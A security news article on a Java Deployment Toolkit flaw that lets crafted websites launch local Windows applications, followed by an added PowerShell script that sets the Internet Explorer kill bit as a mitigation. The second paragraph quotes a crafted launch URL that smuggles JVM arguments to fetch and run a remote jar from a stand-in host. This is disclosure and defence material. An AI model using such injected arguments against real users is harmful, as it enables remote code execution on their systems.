Java exploit launches local Windows applications
Tavis Ormandy has discovered a security vulnerability in the Java Deployment Toolkit (JDT) which can be exploited to launch arbitrary applications on a Windows system using a crafted website. The vulnerability could, for example, be used to download and run a trojan via FTP. JDT has been installed as part of Java since Java 6 Update 10. It is intended to make it easier for developers to distribute applications. According to Ormandy, the problem is the result of insufficient filtering of URLs, allowing arbitrary parameters to be fed to Java Web Start (JWS). JWS is able to download external Java applications using the Java Network Launching Protocol (JNLP) and run them in the VM.
By feeding crafted URLs (e.g. http: -J-jar -J\\\\www.example.com\\exploit.jar none) to the launch function, it is possible to download additional Java code and cause the Java VM to launch local applications with the user's privileges. Ormandy has published a demo exploit which downloads the file calc.jar, which launches the calculator from the command line.
In a quick test carried out by the heise Security editorial team, on a system running Windows XP, Java 6 Update 18 and Internet Explorer 8, it did indeed launch the calculator. On a Windows 7 system with IE 8, however, the Java VM merely displayed an error message. The exploit is also reported to work with Firefox (under Windows), but failed to do so in our tests.
Ormandy says he has informed Sun (now Oracle) of the problem. According to his report, Sun did not consider the vulnerability to be sufficiently critical to release an emergency patch outside of its three-month patch cycle. Until an update is released, Ormandy is advising users to set the kill bit for the JDT ActiveX control. This can either be performed manually, as described by Microsoft, or rather more simply using the AxBan tool. The CLSID for the control is CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. For Firefox, restricting access to npdeploytk.dll should block the exploit.
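The manual kill-bit procedure referred to above, as an added example that is not part of the original article or of Microsoft's tooling: it writes the Compatibility Flags value of 0x400 under Internet Explorer's ActiveX Compatibility key for the CLSID named in the text, covers the Wow6432Node view on 64-bit Windows, and reads the value back to confirm it took. It assumes an elevated PowerShell prompt and nothing else beyond the CLSID given in the article.

```powershell
# Added example (not from the article): set the IE kill bit for the JDT ActiveX control.
# Mechanism (documented by Microsoft): a DWORD 'Compatibility Flags' = 0x400 under
#   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
# prevents Internet Explorer from instantiating the control.
# Run from an elevated PowerShell prompt.

$clsid = '{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}'   # JDT control CLSID from the advisory
$killBit = 0x400

$paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid")

# 64-bit Windows keeps a separate compatibility list for the 32-bit browser under Wow6432Node;
# only touch it if that hive view actually exists (it does not on 32-bit XP).
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
}

foreach ($p in $paths) {
    if (-not (Test-Path $p)) {
        New-Item -Path $p -Force | Out-Null
    }
    Set-ItemProperty -Path $p -Name 'Compatibility Flags' -Value $killBit -Type DWord
}

# Verify: each path should now report 0x400 (decimal 1024).
foreach ($p in $paths) {
    $flags = (Get-ItemProperty -Path $p -Name 'Compatibility Flags').'Compatibility Flags'
    $state = if ($flags -band $killBit) { 'kill bit SET' } else { 'kill bit MISSING' }
    '{0}  ->  0x{1:X}  ({2})' -f $p, $flags, $state
}
```

Restart Internet Explorer after running it; the kill bit only affects IE (and hosts that honour it), so the Firefox plugin npdeploytk.dll still needs the separate access restriction mentioned above.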
- Java Deployment Toolkit Performs Insufficient Validation of Parameters, security advisory from Tavis Ormandy.